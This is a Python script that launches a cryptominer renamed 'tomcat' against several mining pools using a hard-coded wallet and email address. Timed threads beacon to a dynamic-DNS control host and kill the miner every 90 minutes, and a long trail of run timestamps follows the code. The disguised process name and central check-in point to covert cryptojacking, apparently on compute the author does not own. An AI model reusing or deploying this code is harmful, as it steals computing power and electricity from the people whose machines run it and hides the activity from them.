import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:35:04.337947
#2018-02-17 17:23:07.116315
#2018-02-17 19:12:07.084004
#2018-02-17 21:02:07.222456
#2018-02-17 22:47:05.290566
#2018-02-18 00:31:05.517027
#2018-02-18 02:21:03.944952
#2018-02-18 04:08:05.825453
#2018-02-18 05:59:01.424180
#2018-02-18 07:49:07.622275
#2018-02-18 09:37:05.339154
#2018-02-18 11:23:06.041797
#2018-02-18 13:09:07.077067
#2018-02-18 14:57:04.825558
#2018-02-18 16:46:04.855279
#2018-02-18 18:34:02.185510
#2018-02-18 20:22:02.260762
#2018-02-18 22:08:01.962820
#2018-02-18 23:55:01.662279
#2018-02-19 01:41:02.184004
#2018-02-19 03:29:01.875884
#2018-02-19 05:13:07.244718
#2018-02-19 07:01:03.686515
#2018-02-19 08:49:01.420627
#2018-02-19 10:39:07.433185
#2018-02-19 12:27:07.993240
#2018-02-19 14:14:06.450815
#2018-02-19 16:03:05.017485
#2018-02-19 17:51:07.781161
#2018-02-19 19:39:07.826166
#2018-02-19 21:28:08.402721
#2018-02-19 23:14:06.015760
#2018-02-20 00:59:06.086016
#2018-02-20 02:49:06.639039
#2018-02-20 04:36:01.619915
#2018-02-20 06:20:01.600584
#2018-02-20 08:05:03.959165
#2018-02-20 09:50:03.027408
#2018-02-20 11:34:01.379832
#2018-02-20 13:22:01.737164
#2018-02-20 15:06:09.857034
#2018-02-20 16:50:03.184789
#2018-02-20 18:32:09.129501
#2018-02-20 20:22:08.123581
#2018-02-20 22:09:07.948979
#2018-02-20 23:51:07.730213
#2018-02-21 01:36:07.557487
#2018-02-21 03:24:05.990696
#2018-02-21 05:13:06.059365
#2018-02-21 07:02:05.311328
#2018-02-21 08:47:06.940037
#2018-02-21 10:33:06.589596
#2018-02-21 12:23:01.781050
#2018-02-21 14:11:06.721718
#2018-02-21 15:57:11.043278
#2018-02-21 17:50:14.576608
#2018-02-21 19:35:06.873447
#2018-02-21 21:23:08.006417
#2018-02-21 23:10:07.216134
#2018-02-22 00:57:05.391766
#2018-02-22 02:46:02.167988
#2018-02-22 04:32:01.714023
#2018-02-22 06:18:05.502885
#2018-02-22 08:04:07.545083
#2018-02-22 09:52:08.571312
#2018-02-22 11:37:04.247959
#2018-02-22 13:24:04.650624
#2018-02-22 15:14:07.400516
#2018-02-22 16:57:01.950552
#2018-02-22 18:44:12.114573
#2018-02-22 20:36:07.121189
#2018-02-22 22:22:06.084153
#2018-02-23 00:08:01.786254
#2018-02-23 01:56:04.244694
#2018-02-23 03:47:02.127967
#2018-02-23 05:31:01.508672
#2018-02-23 07:14:06.849384
#2018-02-23 09:20:02.863048
#2018-02-23 11:27:08.405370
#2018-02-23 13:18:07.301152
#2018-02-23 15:05:08.168513
#2018-02-23 16:56:04.891906
#2018-02-23 18:33:07.183699
#2018-02-23 20:20:07.925083
#2018-02-23 22:07:03.934784
#2018-02-23 23:55:04.551537
#2018-02-24 01:45:08.064928
#2018-02-24 03:33:04.055264
#2018-02-24 05:18:01.774115
#2018-02-24 07:06:06.240082
#2018-02-24 08:54:02.175677
#2018-02-24 10:58:05.061597
#2018-02-24 12:46:08.078993
#2018-02-24 14:35:04.223677
#2018-02-24 16:21:01.254496
#2018-02-24 18:15:02.433159
#2018-02-24 20:01:05.437947
#2018-02-24 21:43:07.781607
#2018-02-25 00:40:03.100134
#2018-02-25 03:33:06.555555
#2018-02-25 07:12:03.691476